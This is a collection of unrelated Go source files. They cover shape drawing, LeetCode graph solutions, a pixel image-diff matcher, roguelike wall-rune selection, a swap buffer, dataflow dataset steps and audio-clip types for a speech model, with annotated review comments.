		// shape — confirm this is intended rather than once per object.
		for _, customDrawFunc := range o.options.CustomDrawFunc {
			customDrawFunc(&o, imd)
		}
	}
}
// drawCircle renders a circle shape at the centre of its bounding box, using
// the object's configured colour and line thickness.
func (o Object) drawCircle(imd *imdraw.IMDraw, shape *chipmunk.Shape) {
	bb := shape.BB
	centre := pixel.V(
		float64(bb.Lower.X+bb.Upper.X)/2,
		float64(bb.Lower.Y+bb.Upper.Y)/2,
	)
	imd.Color = o.options.Color
	imd.Push(centre)
	imd.Circle(float64(shape.GetAsCircle().Radius), o.options.Thickness)
}
// drawBox renders a box shape. The axis-aligned bounding box plus the body's
// rotation angle are used to reconstruct the box's four rotated corners.
func (o Object) drawBox(imd *imdraw.IMDraw, shape *chipmunk.Shape) {
	lower := shape.BB.Lower
	upper := shape.BB.Upper
	angle := float64(shape.Body.Angle())
	box := shape.GetAsBox()
	width := float64(box.Width)
	height := float64(box.Height)
	// normalise the angle into [0, pi): a box is symmetric under half-turns.
	// NOTE(review): negative angles are not normalised here — confirm the
	// physics engine only reports non-negative angles.
	for angle > math.Pi {
		angle -= math.Pi
	}
	// l is the edge length adjacent to the bounding box's bottom edge; past a
	// quarter turn the roles of width and height swap
	l := width
	if angle > math.Pi/2 {
		angle -= math.Pi / 2
		l = height
	}
	sin, cos := math.Sincos(angle)
	// walk the bounding box, offsetting each corner along the rotated edge
	corners := []pixel.Vec{
		pixel.V(float64(upper.X)-l*cos, float64(lower.Y)),
		pixel.V(float64(upper.X), float64(lower.Y)+l*sin),
		pixel.V(float64(lower.X)+l*cos, float64(upper.Y)),
		pixel.V(float64(lower.X), float64(upper.Y)-l*sin),
	}
	// flip debug to true to also outline the axis-aligned bounding box
	const debug = false
	if debug {
		imd.Color = colornames.White
		imd.Push(pixel.V(float64(lower.X), float64(lower.Y)))
		imd.Push(pixel.V(float64(upper.X), float64(upper.Y)))
		imd.Rectangle(0)
	}
	imd.Color = o.options.Color
	imd.Push(corners...)
	imd.Polygon(o.options.Thickness)
}
package main
import (
. "github.com/9d77v/leetcode/pkg/algorithm/unionfind"
)
/*
题目:除法求值
给你一个变量对数组 equations 和一个实数值数组 values 作为已知条件,其中 equations[i] = [Ai, Bi] 和 values[i] 共同表示等式 Ai / Bi = values[i] 。每个 Ai 或 Bi 是一个表示单个变量的字符串。
另有一些以数组 queries 表示的问题,其中 queries[j] = [Cj, Dj] 表示第 j 个问题,请你根据已知条件找出 Cj / Dj = ? 的结果作为答案。
返回 所有问题的答案 。如果存在某个无法确定的答案,则用 -1.0 替代这个答案。
注意:输入总是有效的。你可以假设除法运算中不会出现除数为 0 的情况,且不存在任何矛盾的结果。
提示:
1 <= equations.length <= 20
equations[i].length == 2
1 <= Ai.length, Bi.length <= 5
values.length == equations.length
0.0 < values[i] <= 20.0
1 <= queries.length <= 20
queries[i].length == 2
1 <= Cj.length, Dj.length <= 5
Ai, Bi, Cj, Dj 由小写英文字母与数字组成
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/evaluate-division
*/
/*
Approach 1: breadth-first search over the ratio graph.
Time complexity:  O(ML + Q*(L+M))
Space complexity: O(NL + M)
*/
func calcEquationFunc1(equations [][]string, values []float64, queries [][]string) []float64 {
	ids := buildIDMap(equations)
	graph := buildEdgeGraph(ids, equations, values)
	answers := make([]float64, len(queries))
	for i, query := range queries {
		from, okFrom := ids[query[0]]
		to, okTo := ids[query[1]]
		if okFrom && okTo {
			answers[i] = bfs(graph, from, to)
		} else {
			// a variable that never appeared in any equation is unanswerable
			answers[i] = -1
		}
	}
	return answers
}
// buildIDMap assigns a dense integer id to every distinct variable name that
// appears in the equations, in order of first appearance.
func buildIDMap(equations [][]string) map[string]int {
	idMap := make(map[string]int, 2*len(equations))
	for _, eq := range equations {
		for _, name := range eq {
			if _, seen := idMap[name]; !seen {
				idMap[name] = len(idMap)
			}
		}
	}
	return idMap
}
// buildEdgeGraph builds an adjacency list where each equation a/b = v adds a
// forward edge a->b with weight v and a reverse edge b->a with weight 1/v.
func buildEdgeGraph(idMap map[string]int, equations [][]string, values []float64) [][]edge {
	graph := make([][]edge, len(idMap))
	for i, eq := range equations {
		from, to := idMap[eq[0]], idMap[eq[1]]
		ratio := values[i]
		graph[from] = append(graph[from], edge{to, ratio})
		graph[to] = append(graph[to], edge{from, 1 / ratio})
	}
	return graph
}
// edge is a weighted, directed adjacency-list entry: following it multiplies
// the accumulated ratio by weight.
type edge struct {
	to     int
	weight float64
}
// bfs walks the ratio graph from start, multiplying edge weights along the
// way, and returns the ratio start/end, or -1 if end is unreachable.
func bfs(graph [][]edge, start, end int) float64 {
	ratios := make([]float64, len(graph))
	ratios[start] = 1
	frontier := []int{start}
	for len(frontier) > 0 {
		node := frontier[0]
		frontier = frontier[1:]
		if node == end {
			return ratios[node]
		}
		for _, e := range graph[node] {
			// a zero ratio marks an unvisited node (all real ratios are > 0)
			if ratios[e.to] == 0 {
				ratios[e.to] = ratios[node] * e.weight
				frontier = append(frontier, e.to)
			}
		}
	}
	return -1
}
/*
Approach 2: Floyd–Warshall-style transitive closure of the ratio graph.
Time complexity:  O(ML + N^3 + QL)
Space complexity: O(NL + N^2)
*/
func calcEquationFunc2(equations [][]string, values []float64, queries [][]string) []float64 {
	ids := buildIDMap(equations)
	graph := buildGraph(ids, equations, values)
	flyod(graph)
	answers := make([]float64, len(queries))
	for i, query := range queries {
		from, okFrom := ids[query[0]]
		to, okTo := ids[query[1]]
		if !okFrom || !okTo || graph[from][to] == 0 {
			// unknown variable or no path between the two variables
			answers[i] = -1
		} else {
			answers[i] = graph[from][to]
		}
	}
	return answers
}
// buildGraph builds a dense ratio matrix: graph[a][b] holds the known ratio
// a/b (0 means unknown), with the reciprocal stored in the mirror cell.
func buildGraph(idMap map[string]int, equations [][]string, values []float64) [][]float64 {
	n := len(idMap)
	graph := make([][]float64, n)
	for i := range graph {
		graph[i] = make([]float64, n)
	}
	for i, eq := range equations {
		a, b := idMap[eq[0]], idMap[eq[1]]
		graph[a][b] = values[i]
		graph[b][a] = 1 / values[i]
	}
	return graph
}
// flyod computes the transitive closure of the ratio matrix in place
// (Floyd–Warshall): whenever i/k and k/j are known, i/j becomes their product.
func flyod(graph [][]float64) {
	n := len(graph)
	for k := 0; k < n; k++ {
		for i := 0; i < n; i++ {
			for j := 0; j < n; j++ {
				if graph[i][k] > 0 && graph[k][j] > 0 {
					graph[i][j] = graph[i][k] * graph[k][j]
				}
			}
		}
	}
}
/*
方法三:并查集
时间复杂度:О(ML+N+MlogN+Q⋅(L+logN))
空间复杂度:О(NL)
运行时间:0 ms 内存消耗:2.1 MB
*/
func calcEquationFunc3(equations [][]string, values []float64, queries [][]string) []float64 {
equationsSize := len(equations)
unionFind := NewWeightUnionFind(2 * equationsSize)
idMap := make(map[string]int, 2*equationsSize)
for i, equation := range equations {
a, b := equation[0], equation[1]
if _, has := idMap[a]; !has {
idMap[a] = len(idMap)
}
if _, has := idMap[b]; !has {
idMap[b] = len(idMap)
}
unionFind.Union(idMap[a], idMap[b], values[i])
}
res := make([]float64, len(queries))
for i, q := range queries {
id1, hasS := idMap[q[0]]
id2, hasE := idMap[q[1]]
if !hasS || !hasE {
res[i] = -1
} else {
res[i] = unionFind.IsConnected(id1, id2)
}
}
return res
} | internal/leetcode/399.evaluate-division/main.go | 0.54359 | 0.416441 | main.go | starcoder |
package pixel
import (
"image"
"image/color"
)
// Option configures Match.
type Option struct {
	Threshold float32 // per-pixel colour-difference threshold; smaller is stricter
	IncludeAA bool    // when true, anti-aliased pixels are counted as differences
}
// Match compares img1 and img2 over rect and returns the number of differing
// pixels. If output is non-nil, a diff visualisation is drawn into it: red
// for real differences, yellow for detected anti-aliasing, and a faded
// greyscale of img1 elsewhere. A nil opt uses threshold 0.1 and excludes
// anti-aliased pixels from the count.
func Match(img1, img2 image.Image, rect image.Rectangle, output *image.RGBA, opt *Option) int {
	var threshold float32
	threshold = 0.1
	// NOTE(review): a non-nil opt always overrides the default, so an unset
	// opt.Threshold of 0 makes every pixel count as different — confirm.
	if opt != nil {
		threshold = opt.Threshold
	}
	// 35215 is the maximum possible YIQ difference; scale by threshold^2
	maxDelta := 35215 * threshold * threshold
	diff := 0
	includeAA := false
	if opt != nil {
		includeAA = opt.IncludeAA
	}
	for y := rect.Min.Y; y < rect.Max.Y; y++ {
		for x := rect.Min.X; x < rect.Max.X; x++ {
			pos := image.Point{X: x, Y: y}
			// squared perceptual colour difference in YIQ space
			delta := colorDelta(img1, img2, pos, pos, false)
			if delta > maxDelta {
				// over threshold: either anti-aliasing (yellow) or a real diff (red)
				if !includeAA && (antialiased(img1, img2, x, y, rect.Max.X, rect.Max.Y) || antialiased(img2, img1, x, y, rect.Max.X, rect.Max.Y)) {
					if output != nil {
						drawPixel(output, pos, color.RGBA{255, 255, 0, 255})
					}
				} else {
					if output != nil {
						drawPixel(output, pos, color.RGBA{255, 0, 0, 255})
					}
					diff++
				}
			} else if output != nil {
				// unchanged pixel: draw a faded greyscale version of img1
				val := blend2(grayPixel(img1, pos), 0.1)
				v := uint8(val)
				drawPixel(output, pos, color.RGBA{v, v, v, 255})
			}
		}
	}
	return diff
}
// colorDelta returns the squared perceptual difference between pixel k of
// img1 and pixel m of img2, measured in YIQ colour space. When yOnly is true
// only the (signed) brightness difference is returned.
func colorDelta(img1, img2 image.Image, k, m image.Point, yOnly bool) float32 {
	color1 := img1.At(k.X, k.Y)
	color2 := img2.At(m.X, m.Y)
	// RGBA() returns 16-bit channels; shift down to 8-bit
	red1, green1, blue1, alpha1 := color1.RGBA()
	red1 = red1 >> 8
	green1 = green1 >> 8
	blue1 = blue1 >> 8
	alpha1 = alpha1 >> 8
	red2, green2, blue2, alpha2 := color2.RGBA()
	red2 = red2 >> 8
	green2 = green2 >> 8
	blue2 = blue2 >> 8
	alpha2 = alpha2 >> 8
	// NOTE(review): alpha/255 is integer division, so a1/a2 are only ever
	// 0 or 1; partially transparent pixels are treated as fully transparent —
	// confirm whether fractional alpha blending was intended (see blend).
	a1 := alpha1 / 255
	a2 := alpha2 / 255
	// composite each channel over a white background
	r1 := blend(red1, a1)
	g1 := blend(green1, a1)
	b1 := blend(blue1, a1)
	r2 := blend(red2, a2)
	g2 := blend(green2, a2)
	b2 := blend(blue2, a2)
	y := rgb2y(r1, g1, b1) - rgb2y(r2, g2, b2)
	if yOnly {
		return y
	}
	i := rgb2i(r1, g1, b1) - rgb2i(r2, g2, b2)
	q := rgb2q(r1, g1, b1) - rgb2q(r2, g2, b2)
	// weighted squared distance in YIQ space
	return 0.5053*y*y + 0.299*i*i + 0.1957*q*q
}
// blend composites channel value c over a white (255) background with
// opacity a. Callers pass a as alpha/255 using integer division, so a is only
// ever 0 or 1: the result is 255 for a==0 and c for a==1 (the uint32
// wrap-around in (c-255)*a cancels out exactly when a==1).
func blend(c, a uint32) float32 {
	return float32(255 + (c-255)*a)
}
// blend2 alpha-blends the float channel value c against a white (255)
// background using opacity a in [0, 1].
func blend2(c, a float32) float32 {
	delta := c - 255
	return 255 + delta*a
}
// rgb2y converts RGB to the Y (luma) component of the YIQ colour space.
func rgb2y(red, green, blue float32) float32 {
	return red*0.29889531 + green*0.58662247 + blue*0.11448223
}
// rgb2i converts RGB to the I (in-phase chroma) component of YIQ.
func rgb2i(red, green, blue float32) float32 {
	return red*0.59597799 - green*0.27417610 - blue*0.32180189
}
// rgb2q converts RGB to the Q (quadrature chroma) component of YIQ.
func rgb2q(red, green, blue float32) float32 {
	return red*0.21147017 - green*0.52261711 + blue*0.31114694
}
// antialiased reports whether the pixel at (x1, y1) of imgA looks like an
// anti-aliasing artifact, by examining its 3x3 neighbourhood (clamped to the
// w x h bounds). When imgB is non-nil, the darkest and brightest neighbours
// are recursively cross-checked in both images.
func antialiased(imgA, imgB image.Image, x1, y1, w, h int) bool {
	x0 := max(x1-1, 0)
	y0 := max(y1-1, 0)
	x2 := min(x1+1, w-1)
	y2 := min(y1+1, h-1)
	pos := image.Point{X: x1, Y: y1}
	var zeroes, positives, negatives int
	var minX, minY, maxX, maxY int
	// NOTE(review): _min/_max start at 0, so only strictly darker/brighter
	// neighbours update the extrema — matches the reference algorithm.
	var _min, _max float32
	for x := x0; x <= x2; x++ {
		for y := y0; y <= y2; y++ {
			if x == x1 && y == y1 {
				continue
			}
			// signed brightness difference to the neighbour
			delta := colorDelta(imgA, imgA, pos, image.Point{X: x, Y: y}, true)
			if delta == 0 {
				zeroes++
			} else if delta > 0 {
				positives++
			} else if delta < 0 {
				negatives++
			}
			// more than two identical siblings: not anti-aliasing
			if zeroes > 2 {
				return false
			}
			if imgB == nil {
				continue
			}
			// track the darkest and brightest neighbours for cross-checking
			if delta < _min {
				_min = delta
				minX = x
				minY = y
			}
			if delta > _max {
				_max = delta
				maxX = x
				maxY = y
			}
		}
	}
	if imgB == nil {
		return true
	}
	// anti-aliasing needs both darker and brighter neighbours
	if negatives == 0 || positives == 0 {
		return false
	}
	// the extremes must be plain (non-AA) pixels in both images
	return (!antialiased(imgA, nil, minX, minY, w, h) && !antialiased(imgB, nil, minX, minY, w, h)) ||
		(!antialiased(imgA, nil, maxX, maxY, w, h) && !antialiased(imgB, nil, maxX, maxY, w, h))
}
// min returns the smaller of two ints.
func min(x, y int) int {
	if y < x {
		return y
	}
	return x
}
// max returns the larger of two ints.
func max(x, y int) int {
	if y > x {
		return y
	}
	return x
}
// grayPixel returns the brightness (YIQ Y component) of the pixel at pos,
// composited over a white background. Alpha handling matches colorDelta:
// integer division reduces alpha to 0 (transparent) or 1 (opaque).
func grayPixel(img image.Image, pos image.Point) float32 {
	c := img.At(pos.X, pos.Y)
	red, green, blue, alpha := c.RGBA()
	red = red >> 8
	green = green >> 8
	blue = blue >> 8
	alpha = alpha >> 8
	a := alpha / 255
	r := blend(red, a)
	g := blend(green, a)
	b := blend(blue, a)
	return rgb2y(r, g, b)
}
// drawPixel sets a single pixel of the output diff image.
func drawPixel(img *image.RGBA, pos image.Point, color color.Color) {
	img.Set(pos.X, pos.Y, color)
}
package canfinish
/*
* @lc app=leetcode id=207 lang=golang
*
* [207] Course Schedule
*
* https://leetcode.com/problems/course-schedule/description/
*
* algorithms
* Medium (37.19%)
* Total Accepted: 208.1K
* Total Submissions: 554.5K
* Testcase Example: '2\n[[1,0]]'
*
* There are a total of n courses you have to take, labeled from 0 to n-1.
*
* Some courses may have prerequisites, for example to take course 0 you have
* to first take course 1, which is expressed as a pair: [0,1]
*
* Given the total number of courses and a list of prerequisite pairs, is it
* possible for you to finish all courses?
*
* Example 1:
*
*
* Input: 2, [[1,0]]
* Output: true
* Explanation: There are a total of 2 courses to take.
* To take course 1 you should have finished course 0. So it is possible.
*
* Example 2:
*
*
* Input: 2, [[1,0],[0,1]]
* Output: false
* Explanation: There are a total of 2 courses to take.
* To take course 1 you should have finished course 0, and to take course 0 you
* should
* also have finished course 1. So it is impossible.
*
*
* Note:
*
*
* The input prerequisites is a graph represented by a list of edges, not
* adjacency matrices. Read more about how a graph is represented.
* You may assume that there are no duplicate edges in the input
* prerequisites.
*
*
*/
// Kahn's algorithm.
// canFinish reports whether all numCourses courses can be completed given the
// prerequisite pairs, i.e. whether the prerequisite graph is acyclic: it
// repeatedly peels off vertices with no incoming edges; if every vertex is
// eventually peeled, there is no cycle.
// NOTE: prerequisites is consumed destructively via deleteEdge.
func canFinish(numCourses int, prerequisites [][]int) bool {
	// 0 or 1 edges can never form a cycle
	if prerequisites == nil || len(prerequisites) < 2 {
		return true
	}
	// inDegreeZero[i] is true while course i has no incoming edge
	// (here a pair [a, b] is treated as an edge pointing into b)
	inDegreeZero := make([]bool, numCourses, numCourses)
	for i := range inDegreeZero {
		inDegreeZero[i] = true
	}
	for _, v := range prerequisites {
		inDegreeZero[v[1]] = false
	}
	inDegreeZeroNumbers := make([]int, 0)
	newInDegreeZeroNumbers := make([]int, 0)
	for i, v := range inDegreeZero {
		if v {
			inDegreeZeroNumbers = append(inDegreeZeroNumbers, i)
		}
	}
	// peel off zero-in-degree vertices level by level
	for len(inDegreeZeroNumbers) > 0 {
		newInDegreeZeroNumbers = newInDegreeZeroNumbers[0:0]
		for _, n := range inDegreeZeroNumbers {
			// remove all edges leaving n; their endpoints may now be free
			endPoints := deleteEdge(&prerequisites, n)
			for _, v := range endPoints {
				if isZeroInDegree(prerequisites, v) {
					inDegreeZero[v] = true
					newInDegreeZeroNumbers = append(newInDegreeZeroNumbers, v)
				}
			}
		}
		newInDegreeZeroNumbers, inDegreeZeroNumbers = inDegreeZeroNumbers, newInDegreeZeroNumbers
	}
	// any vertex that never reached zero in-degree lies on a cycle
	for _, v := range inDegreeZero {
		if !v {
			return false
		}
	}
	return true
}
// isZeroInDegree reports whether no remaining pair has number as its second
// element, i.e. the course has no incoming edge left.
func isZeroInDegree(prerequisites [][]int, number int) bool {
	for _, pair := range prerequisites {
		if pair[1] == number {
			return false
		}
	}
	return true
}
// deleteEdge removes every pair whose first element equals start from
// *prerequisites and returns the second elements of the removed pairs
// (in reverse order of their original positions).
func deleteEdge(prerequisites *[][]int, start int) (endPoint []int) {
	// collect the indices of all pairs leaving start
	var hits []int
	for i, pair := range *prerequisites {
		if pair[0] == start {
			hits = append(hits, i)
		}
	}
	// remove from highest index to lowest so earlier indices stay valid
	for j := len(hits) - 1; j >= 0; j-- {
		idx := hits[j]
		endPoint = append(endPoint, (*prerequisites)[idx][1])
		remaining := append([][]int{}, (*prerequisites)[:idx]...)
		*prerequisites = append(remaining, (*prerequisites)[idx+1:]...)
	}
	return
}
package wallify
import (
"image"
)
type Wallifier interface {
IsWallable(p image.Point) bool
IsSeen(p image.Point) bool
}
/*
Wallify determines the type of wall rune to use for a given cell.
A bitmask of its neighbors is made:
1
8#2
4
The bit is set if the corresponding neighbor IsWallable.
For the given bitmask, the corresponding rune index is found in the wallRune slice.
This rune index is then found in the provided runes slice, which can be,
say, SingleWall or DoubleWall, and these contain the rune code to be returned.
Normally, if the entire level is discovered (IsSeen), this would be enough.
However, if this is all we do, T-shapes and Cross-shapes cause problems
if one of the blocks adjacent to a T or Cross has not yet been discovered. Consider:
│
├─
│
If the lower straight wall has not yet been discovered, then the fact that the
corner is a T-shape rather than a corner-shape gives away the fact that there is a
wall on the other side.
To fix this, if the first step results in a cross or a T, we create a visibility mask
of whether the cell's neighbors are visible, and AND it with the bitmask.
This works for most situations, except when not a single neighbor has been seen;
this would result in a pillar, which would turn into a wall when neighbors are
later discovered. This looks terrible.
So, in order to fix this, if the retuls of step 2 is a pillar, we try to fit one
of the invisiWall elements to the mask, which contains only straight walls and corners.
Only if we can't fit any of these, a pillar is probably right.
*/
// Rune tables indexed by wall shape: [pillar, vertical, horizontal, four
// corners, four T-shapes, cross]. wallRune maps a 4-bit neighbor mask
// (1=N, 2=E, 4=S, 8=W) onto these indices.
//var singleWall = []int{79, 179, 196, 192, 218, 191, 217, 195, 194, 180, 193, 197}
//var singleWall = []int{9, 179, 196, 192, 218, 191, 217, 195, 194, 180, 193, 197}
var SingleWall = []int{233, 179, 196, 192, 218, 191, 217, 195, 194, 180, 193, 197}
var DoubleWall = []int{233, 186, 205, 200, 201, 187, 188, 204, 203, 185, 202, 206}
var wallRune = []int{0, 1, 2, 3, 1, 1, 4, 7, 2, 6, 2, 10, 5, 9, 8, 11}
// invisiWall lists the straight-wall and corner masks (no Ts or crosses),
// tried in order when no neighbor of a T/cross has been seen.
var invisiWall = []int{5, 10, 3, 6, 12, 9, 1, 2, 4, 8}
func Wallify(w Wallifier, p image.Point, runes []int) int {
x := image.Point{X: 1}
y := image.Point{Y: 1}
bits := 0
if w.IsWallable(p.Sub(y)) {
bits |= 1
}
if w.IsWallable(p.Add(x)) {
bits |= 2
}
if w.IsWallable(p.Add(y)) {
bits |= 4
}
if w.IsWallable(p.Sub(x)) {
bits |= 8
}
switch bits {
case 7, 14, 13, 11, 15:
// Cross or T-shape; check visibility
visibits := 0
if w.IsWallable(p.Sub(y)) && w.IsSeen(p.Sub(y)) {
visibits |= 1
}
if w.IsWallable(p.Add(x)) && w.IsSeen(p.Add(x)) {
visibits |= 2
}
if w.IsWallable(p.Add(y)) && w.IsSeen(p.Add(y)) {
visibits |= 4
}
if w.IsWallable(p.Sub(x)) && w.IsSeen(p.Sub(x)) {
visibits |= 8
}
if visibits&bits == 0 {
// No neighbors are visible, which would result in a pillar.
// Instead, try to fit one of the non-T, non-cross shapes.
for _, iw := range invisiWall {
if bits&visibits&iw == iw {
bits = iw
break
}
}
} else {
bits = bits & visibits
}
}
return runes[wallRune[bits]]
} | roguelike/wallify/wallify.go | 0.507568 | 0.522872 | wallify.go | starcoder |
package buffer
import (
"encoding/gob"
"io"
)
// swap is a two-tier buffer: writes land in the small buffer A until they
// would overflow its capacity, at which point A's contents are migrated into
// the larger buffer B, which then takes over.
type swap struct {
	A BufferAt // primary (smaller) buffer, used first
	B BufferAt // overflow (larger) buffer; must have Cap() > A.Cap()
}
// NewSwap creates a Buffer which writes to a until you write past a.Cap()
// then it io.Copy's from a to b and writes to b.
// Once the Buffer is empty again, it starts over writing to a.
// Note that if b.Cap() <= a.Cap() it will cause a panic, b is expected
// to be larger in order to accommodate writes past a.Cap().
// Both buffers are adapted to BufferAt via toBufferAt.
func NewSwap(a, b Buffer) Buffer {
	return NewSwapAt(toBufferAt(a), toBufferAt(b))
}
// NewSwapAt creates a BufferAt which writes to a until you write past a.Cap()
// then it io.Copy's from a to b and writes to b.
// Once the Buffer is empty again, it starts over writing to a.
// Note that if b.Cap() <= a.Cap() it will cause a panic, b is expected
// to be larger in order to accommodate writes past a.Cap().
// It panics (rather than returning an error) so misconfiguration fails fast.
func NewSwapAt(a, b BufferAt) BufferAt {
	if b.Cap() <= a.Cap() {
		panic("Buffer b must be larger than a.")
	}
	return &swap{A: a, B: b}
}
// Len returns the total number of unread bytes across both tiers.
func (buf *swap) Len() int64 {
	return buf.A.Len() + buf.B.Len()
}
// Cap returns the capacity of the larger buffer B, which is the effective
// capacity of the swap as a whole.
func (buf *swap) Cap() int64 {
	return buf.B.Cap()
}
// Read drains buffer A first; only once A is empty are reads served from B.
func (buf *swap) Read(p []byte) (n int, err error) {
	if buf.A.Len() > 0 {
		return buf.A.Read(p)
	}
	return buf.B.Read(p)
}
// ReadAt reads at offset off from A while A holds data, otherwise from B.
// NOTE(review): off is interpreted relative to whichever tier is active, so
// offsets are only stable while the data resides in a single tier — confirm.
func (buf *swap) ReadAt(p []byte, off int64) (n int, err error) {
	if buf.A.Len() > 0 {
		return buf.A.ReadAt(p, off)
	}
	return buf.B.ReadAt(p, off)
}
// Write appends p. If B is already in use the write goes to B; if the write
// would overflow A's capacity, A's contents are first migrated into B with
// io.Copy and the write then lands in B; otherwise it goes to A.
func (buf *swap) Write(p []byte) (n int, err error) {
	switch {
	case buf.B.Len() > 0:
		n, err = buf.B.Write(p)
	case buf.A.Len()+int64(len(p)) > buf.A.Cap():
		// overflow: move A's data into B, then write into B
		_, err = io.Copy(buf.B, buf.A)
		if err == nil {
			n, err = buf.B.Write(p)
		}
	default:
		n, err = buf.A.Write(p)
	}
	return n, err
}
// WriteAt writes p at offset off, with the same tier-selection rules as
// Write: B if B is in use, migrate A to B when the write would exceed A's
// capacity, otherwise A.
func (buf *swap) WriteAt(p []byte, off int64) (n int, err error) {
	switch {
	case buf.B.Len() > 0:
		n, err = buf.B.WriteAt(p, off)
	case off+int64(len(p)) > buf.A.Cap():
		// overflow: move A's data into B, then write into B
		_, err = io.Copy(buf.B, buf.A)
		if err == nil {
			n, err = buf.B.WriteAt(p, off)
		}
	default:
		n, err = buf.A.WriteAt(p, off)
	}
	return n, err
}
// Reset empties both tiers so that writing starts over in A.
func (buf *swap) Reset() {
	buf.A.Reset()
	buf.B.Reset()
}
// init registers the swap type so it can be encoded/decoded with encoding/gob.
func init() {
	gob.Register(&swap{})
}
package flow
// Map operates on each row, and the returned results are passed to next dataset.
// The code snippet is attached to a new script step named "Map"; the output
// dataset has the same number of shards as the input.
func (d *Dataset) Map(code string) *Dataset {
	ret, step := add1ShardTo1Step(d)
	step.Name = "Map"
	step.Script = d.FlowContext.createScript()
	step.Script.Map(code)
	return ret
}
// ForEach operates on each row, but the results are not collected.
// This is used to create some side effects.
func (d *Dataset) ForEach(code string) *Dataset {
	ret, step := add1ShardTo1Step(d)
	step.Name = "ForEach"
	step.Script = d.FlowContext.createScript()
	step.Script.ForEach(code)
	return ret
}
// FlatMap translates each row into multiple rows, which are passed to the
// next dataset.
func (d *Dataset) FlatMap(code string) *Dataset {
	ret, step := add1ShardTo1Step(d)
	step.Name = "FlatMap"
	step.Script = d.FlowContext.createScript()
	step.Script.FlatMap(code)
	return ret
}
// Filter conditionally filter some rows into the next dataset.
// The code should be a function just returning a boolean result.
// Filtering never reorders or repartitions rows, so the sortedness and
// partitioning properties carry over to the output dataset.
func (d *Dataset) Filter(code string) *Dataset {
	ret, step := add1ShardTo1Step(d)
	ret.IsLocalSorted = d.IsLocalSorted
	ret.IsPartitionedBy = d.IsPartitionedBy
	step.Name = "Filter"
	step.Script = d.FlowContext.createScript()
	step.Script.Filter(code)
	return ret
}
// add1ShardTo1Step creates the next dataset with the same shard count as d
// and wires a one-to-one step from d to it.
func add1ShardTo1Step(d *Dataset) (ret *Dataset, step *Step) {
	ret = d.FlowContext.newNextDataset(len(d.Shards))
	step = d.FlowContext.AddOneToOneStep(d, ret)
	return
}
// Select selects multiple fields into the next dataset. The index starts from 1.
// All provided sort options are merged via concat before their field indexes
// are handed to the script.
func (d *Dataset) Select(sortOptions ...*SortOption) *Dataset {
	sortOption := concat(sortOptions)
	ret, step := add1ShardTo1Step(d)
	step.Name = "Select"
	step.Script = d.FlowContext.createScript()
	step.Script.Select(sortOption.Indexes())
	return ret
}
// LocalLimit take the local first n rows and skip all other rows.
// The limit applies per shard, not globally; taking a prefix preserves the
// sortedness and partitioning properties of the input.
func (d *Dataset) LocalLimit(n int) *Dataset {
	ret, step := add1ShardTo1Step(d)
	ret.IsLocalSorted = d.IsLocalSorted
	ret.IsPartitionedBy = d.IsPartitionedBy
	step.Name = "Limit"
	step.Script = d.FlowContext.createScript()
	step.Script.Limit(n)
	return ret
}
package libaural2
import (
"bytes"
"crypto/sha256"
"encoding/base32"
"encoding/binary"
"encoding/gob"
"fmt"
"image/color"
"github.com/lucasb-eyer/go-colorful"
"github.ibm.com/Blue-Horizon/aural2/urbitname"
)
// Duration of audio clip in seconds
const Duration int = 10
// SampleRate of audio
const SampleRate int = 16000
// StrideWidth is the number of samples in one stride
const StrideWidth int = 512
// SamplePerClip is the number of samples in each clip
const SamplePerClip int = SampleRate * Duration
// StridesPerClip is the number of strides per clip
const StridesPerClip int = SamplePerClip / StrideWidth
// SeqLen is the length of sequences to be feed to the LSTM for training.
const SeqLen int = 100
// AudioClipLen is the number of bytes in one audio clip
const AudioClipLen int = SamplePerClip * 2
// InputSize is the length of the input vector, currently one MFCC
const InputSize int = 13
// BatchSize is the size of the one batch
const BatchSize int = 7
// StateList is a list of States
type StateList [StridesPerClip]State
// Input is the one input to the LSTM
type Input [InputSize]float32
// InputSet is the set of inputs for one clip.
type InputSet [StridesPerClip]Input
// Output is one output, the softmax array of States.
type Output []float32
// OutputSet is the set of outputs for one clip.
type OutputSet [StridesPerClip]Output
// Serialize converts an OutputSet to its raw byte form: every output value
// encoded as a 4-byte little-endian float32, in stride order.
func (outputSet *OutputSet) Serialize() (serialized []byte) {
	buf := new(bytes.Buffer)
	for _, output := range outputSet {
		for _, cmdVal := range output {
			// writing to a bytes.Buffer cannot fail, so the error is ignored;
			// binary.LittleEndian is passed by value (it implements ByteOrder)
			binary.Write(buf, binary.LittleEndian, cmdVal)
		}
	}
	// Bug fix: this debug line previously printed "count 0" unconditionally
	// because its counter was never incremented; report the real byte count.
	// NOTE(review): consider removing this debug print from library code.
	fmt.Println("count", buf.Len())
	serialized = buf.Bytes()
	return
}
// AudioClip stores a `Duration` second clip of int16 raw audio bytes
type AudioClip [AudioClipLen]byte
// ID computes the SHA-256 hash of the audio clip, which serves as its
// content-addressed identifier.
func (rawBytes *AudioClip) ID() ClipID {
	return sha256.Sum256(rawBytes[:])
}
// ClipID is the SHA-256 hash of a clip of raw audio
type ClipID [32]byte
// FSsafeString returns an encoding of the ClipID safe for filesystems and URLs.
func (hash ClipID) FSsafeString() string {
return base32.StdEncoding.EncodeToString(hash[:])
}
func (hash ClipID) String() string {
return urbitname.Encode(hash[0:4])
}
// VocabName is the name of a vocabulary
type VocabName string
// State is one exclusive thing the NN can output
type State int
// Just for testing
const (
	Nil State = iota
	Unknown
	Foo
	Bar
	Baz
	Yes
	No
)
// Vocabulary is one exclusive list of words
type Vocabulary struct {
	Name       VocabName
	Size       int
	Names      map[State]string  // display name per state
	Hue        map[State]float64 // hue (degrees) used when rendering the state
	KeyMapping map[string]State  // keyboard key -> state
}
// Color turns a cmd into something that implements the color.Color interface
func (voc Vocabulary) Color(state State) (c color.Color) {
	// Full saturation and value; only the hue varies per state.
	c = colorful.Hsv(voc.Hue[state], 1, 1)
	return
}
// testVocab is a package-level Vocabulary; presumably populated elsewhere
// (e.g. in tests) — it is not initialized here.
var testVocab Vocabulary
// Hue maps the state to a deterministic hue in [0, 360) degrees, derived
// from the first two bytes of the SHA-256 digest of the state's byte value.
func (state State) Hue() (hue float64) {
	digest := sha256.Sum256([]byte{uint8(state)})
	scale := float64(digest[0]) * float64(digest[1]) / (255 * 255)
	return scale * 360
}
// RGBA implements color.Color, rendering the state's hue at full
// saturation and value.
func (state State) RGBA() (uint32, uint32, uint32, uint32) {
	return colorful.Hsv(state.Hue(), 1, 1).RGBA()
}
// Label is one period of time.
type Label struct {
	State State
	Start float64 // the duration since the start of the clip.
